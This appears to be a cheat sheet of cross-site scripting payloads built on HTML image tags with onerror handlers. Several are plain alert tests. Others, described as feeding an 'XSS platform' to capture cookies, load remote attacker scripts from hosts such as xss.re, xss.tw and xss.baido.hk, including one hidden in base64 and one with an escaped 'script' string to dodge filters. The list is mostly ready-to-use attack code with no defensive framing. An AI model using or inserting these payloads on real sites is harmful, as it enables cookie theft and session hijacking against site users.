<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
<img src=# onerror=alert(document.cookie)>
The following use an XSS platform to capture cookies:
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img>
"><img src=x onerror="with(document)body.appendChild(createElement('script')).src='//xss.re/974'"></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src="#">
<img src='0' onerror=with(document)body.appendChild(createElement('script')).src='/xx'>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript('//xss.tw/4091'))>
<img src=N onerror=eval(javascript:document.write(unescape(' <script src="http://xxx.js"></script>'));)>
<img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>